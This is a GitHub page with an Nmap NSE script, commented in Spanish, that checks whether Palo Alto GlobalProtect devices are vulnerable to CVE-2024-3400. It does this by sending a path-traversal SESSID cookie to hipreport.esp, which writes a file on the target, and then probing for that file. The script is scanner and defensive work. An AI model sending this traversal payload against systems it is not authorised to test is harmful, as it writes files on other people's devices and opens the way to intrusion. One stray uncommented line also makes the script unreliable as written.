-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2024-3400_palo.nse
48 lines (38 loc) · 1.71 KB
/
cve-2024-3400_palo.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local string = require "string"
local rand = require "rand"
description = [[
CVE-2024-3400 - Identificacion de equipos PALO ALTO afectados por esta vulnerabilidad.
]]
author = "Jorge Caballero - CYBERTEMPLAR"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "vulnerability"}
puertos. agregar alternativos
portrule = function(host, port)
return (port.service ~= nil and (port.service == "http" or port.service == "https"))
end
action = function(host, port)
local path = "/ssl-vpn/hipreport.esp"
-- random_string
local random_string = rand.random_alpha(8)
local bad_cookie = "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/" .. random_string .. ".txt;"
-- Envia una peticion HTTP POST para intentar la explotacion.
local response = http.post(host, port, path, {
headers = {
["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
["Content-Type"] = "application/x-www-form-urlencoded",
["Cookie"] = bad_cookie
},
body = "test_data=test"
})
if response.status == 200 then
local path_check = "/global-protect/portal/images/" .. random_string .. ".txt"
local check_response = http.get(host, port, path_check)
if check_response.status == 403 or check_response.status == 404 then
return stdnse.format_output(true, "Host (".. host.ip .. ") Potencialmente vulnerable CVE-2024-3400.")
end
end
return stdnse.format_output(false, "No se encontro la vulnerabilidad.")
end